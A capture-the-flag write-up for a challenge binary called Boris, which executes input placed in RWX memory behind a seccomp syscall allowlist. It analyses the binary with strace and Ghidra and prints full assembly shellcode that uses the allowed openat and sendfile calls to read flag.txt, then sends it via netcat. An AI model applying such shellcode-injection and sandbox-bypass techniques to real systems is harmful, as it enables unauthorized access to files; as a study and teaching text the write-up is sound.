Tags: seccomp shellcoding 

Rating: 5.0

## Source Analysis - Boris

### First things first

We are given an ELF x86-64 binary, let's execute it and see what happens.

└─$ ./boris
[.] Boris is bored. My genius needs using! Give me something to do!
[+] Finally, a task! But you'll never break my access codes...
[!] Access codes applied!

''' ':kNWk,
',,, ':dO0Kkc,' 'xWMWOc'
;d0KK0l' 'oNMMMMWK0Oc' dWMMMKc
xMMMW0c' ,dNMMMMMMM0d:'' ',, ,l0WMMMMMWd

--------- I'm INVINCIBLE!! ---------

[.] Good luck... you'll need it!
[!] Better luck next time. SLUGHEADS!

The program is waiting for input, then sleeping for a short moment and printing the text seen above.

### Dynamic Analysis

By running an strace on the program, we can already get a good idea of what is happening in the background. Interesting parts of the output can be seen below:

mmap(0xdead000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0xdead000
read(0, 1234
"1234\n", 4096) = 5
write(1, "[+] Finally, a task! But you'll "..., 63[+] Finally, a task! But you'll never break my access codes...
) = 63
seccomp(SECCOMP_SET_MODE_STRICT, 1, NULL) = -1 EINVAL (Invalid argument)
seccomp(SECCOMP_GET_NOTIF_SIZES, 0, 0x7ffd72c11ae2) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x7fd468e5bc0a} ---
write(1, "[!] Better luck next time. SLUGH"..., 38[!] Better luck next time. SLUGHEADS!
) = 38
exit_group(-1) = ?
+++ exited with 255 +++

Aha! Right before we send our input, the program allocated 4096 bytes of memory with RWX permission at the address 0xdead000. After running the strace twice, we notice that the address doesn't change.

Next we notice a few calls to seccomp(), seccomp can be used to restrict the usage of certain syscalls, more on this later.

At last the program receives a Segmentation Fault and exits. This means the program tried to access invalid memory in one way or another. Since we didn't get a segmentation fault message earlier, it can be assumed the program implements a custom signal handler.

### Static Analysis

If we decompile the program with Ghidra and take a look at the main function, we can already recognize a lot of things we found during dynamic analysis.

do {
if (3 < local_1ac) {
puts("[.] Boris is bored. My genius needs using! Give me something to do!");
map_rwx = mmap((void *)0xdead000,0x1000,7,0x22,0,0);
if ((int)map_rwx == 0xdead000) {
read(0,(void *)0xdead000,0x1000);
puts("[+] Finally, a task! But you\'ll never break my access codes...");
bVar1 = sec();
if ((int)CONCAT71(extraout_var,bVar1) == 0) {
puts("[!] Access codes applied!");
puts("[.] Good luck... you\'ll need it!");
(*(code *)0xdead000)();
uVar3 = 0;
else {
uVar3 = 1;

Okay let's dig through this code a little more. We can ignore the two conditions as we already know we can reach at least `puts("[.] Good luck... you\'ll need it!");` in the code.

This part will allocate 4096 bytes in memory at a fixed address of 0xdead000 with RWX permissions. You can read more about mmap and it's flags [here](https://man7.org/linux/man-pages/man2/mmap.2.html).

map_rwx = mmap((void *)0xdead000,0x1000,7,0x22,0,0);

Then the program reads 4096 bytes from stdin to this previosuly mapped memory area:

read(0,(void *)0xdead000,0x1000);

Afterwards the program does a few sleep commands and finally executes this line:

(*(code *)0xdead000)();

Essentially what this does is treat the memory at 0xdead000 as code/instructions and execute it like a regular function call. That also explains the segmentation fault from earlier, the program tried to execute my `"1234\n"` input, which probably resulted in bad instructions.

So this means we can simply read shellcode from stdin and get a shell, right?! Sadly, no. If we try to read a regular shellcode performing an execve("/bin/sh",0,0) for example, we notice that nothing happens.

### What is seccomp?

Excerpt from wikipedia:
> **seccomp** (short for **secure computing mode**) is a computer security facility in the Linux kernel. seccomp allows a process to make a one-way transition into a "secure" state where it cannot make any system calls except `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors.

So basically seccomp can be used to restrict the usage of syscalls to only a very few, which won't allow us to execute code.

During our initial analysis with strace, we already noticed a few calls to `seccomp()`. Looking a little bit closer with Ghidra we find that the `sec()` function is where these calls are being made.

bool sec(void)

int success;
undefined8 ctx;
uint counter;
undefined4 syscall_nums [8];

ctx = seccomp_init(0x30000);
syscall_nums[0] = 257;
syscall_nums[1] = 0;
syscall_nums[2] = 1;
syscall_nums[3] = 40;
syscall_nums[4] = 60;
syscall_nums[5] = 231;
syscall_nums[6] = 80;
syscall_nums[7] = 230;
counter = 0;
while( true ) {
if (7 < counter) {
success = seccomp_load(ctx);
return success != 0;
success = seccomp_rule_add(ctx,0x7fff0000,syscall_nums[(int)counter],0);
if (success != 0) break;
counter = counter + 1;
return true;

The sec function first initializes a new context by calling `seccomp_init(0x30000);`. The value `0x30000` refers to the [SCMP_ACT_TRAP](https://github.com/seccomp/libseccomp/blob/main/include/seccomp.h.in#L351) action. This means everytime a syscall not in the current filter is called, a SIGTRAP will be triggered.

Next the function initializes an array with 8 values each corresponding with a syscall. Again, you can look up each syscall in [this table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/).

Then it's looping 8 times, calling `seccomp_rule_add(ctx,0x7fff0000,syscall_nums[(int)counter],0)` each time. Essentially it's adding all these 8 syscalls to the filter, so they will be allowed and won't trigger a SIGTRAP.

### Writing the shellcode

Now that we know which syscalls are allowed, we can start to build our shellcode. Since we have 4096 bytes to read, we don't have to worry about space or any other constraints. The read() syscall can even read nullbytes, so we don't have to avoid them (I did anyway, as practice).

The interesting syscalls that I used for my shellcode are:

|%rax|System Call|%rdi|%rsi|%rdx|%r10|
|40|sys_sendfile|int out_fd|int in_fd|off_t *offset|size_t count|
|80|sys_chdir|const char *filename|
|257|sys_openat|int dfd|const char *filename|int flags|int mode|

The challenge description already gave away that the flag is located at `/flag.txt`, so my shellcode would look something like this in pseudo code:

int fd = sys_openat(AT_FDCWD, "flag.txt", 0, 0);
sys_sendfile(1, fd, 0, 30);

I think the code is pretty self explanatory. Reading through the [man page](https://linux.die.net/man/2/openat) for `openat()`, we learn that we need to use `AT_FDCWD` as the directory file descriptor to use the current working directory. The numeric value of `AT_FDCWD` is `-100` as seen [here](https://github.com/spotify/linux/blob/master/include/linux/fcntl.h#L35).

My final shellcode written in assembly can be seen below:

0: 48 31 c0 xor rax,rax ; rax = 0
3: 48 31 db xor rbx,rbx ; rbx = 0
6: b3 2f mov bl,0x2f ; rbx = "/"
8: 50 push rax
9: 53 push rbx
a: 48 89 e7 mov rdi,rsp ; rdi = address of "/"
d: 48 83 c0 50 add rax,0x50 ; rax = 80
11: 0f 05 syscall ; sys_chdir("/")
13: 48 31 c0 xor rax,rax ; rax = 0
16: 48 bb 66 6c 61 67 2e movabs rbx,0x7478742e67616c66 ; rbx = "flag.txt"
1d: 74 78 74
20: 50 push rax
21: 53 push rbx
22: 48 31 ff xor rdi,rdi ; rdi = 0
25: 48 c7 c7 9c ff ff ff mov rdi,0xffffffffffffff9c ; rdi = -100
2c: 48 31 d2 xor rdx,rdx
2f: 48 89 e6 mov rsi,rsp ; rsi = address of "flag.txt"
32: 48 c7 c0 ff fe ff ff mov rax,0xfffffffffffffeff ; rax = -257 (avoid null byte)
39: 48 f7 d8 neg rax ; rax = -rax
3c: 0f 05 syscall ; openat(-100,"flag.txt", 0, 0)
3e: 50 push rax ; push fd to stack
3f: 48 31 c0 xor rax,rax ; rax = 0
42: 48 83 c0 28 add rax,0x28 ; rax = 40
46: 48 31 ff xor rdi,rdi ; rdi = 0
49: 48 ff c7 inc rdi ; rdi = rdi + 1
4c: 5e pop rsi ; rsi = fd
4d: 48 31 d2 xor rdx,rdx ; rdx = 0 (offset)
50: 4d 31 d2 xor r10,r10 ; r10 = 0 (count)
53: 49 83 c2 1e add r10,0x1e ; r10 = 30 (count)
57: 0f 05 syscall ; sendfile(1, fd, 0, 30)

Finally we assemble the shellcode, save it to a file, then redirect it into our netcat command to receive the flag!

└─$ nc 40000 < shellcode.txt

[.] Boris is bored. My genius needs using! Give me something to do!
[+] Finally, a task! But you'll never break my access codes...
[!] Access codes applied!

''' ':kNWk,
',,, ':dO0Kkc,' 'xWMWOc'
;d0KK0l' 'oNMMMMWK0Oc' dWMMMKc
xMMMW0c' ,dNMMMMMMM0d:'' ',, ,l0WMMMMMWd

--------- I'm INVINCIBLE!! ---------

[.] Good luck... you'll need it!
[!] Better luck next time. SLUGHEADS!

Original writeup (https://lo0l.com/2021/10/11/digitaloverdose.html#source-analysis---boris).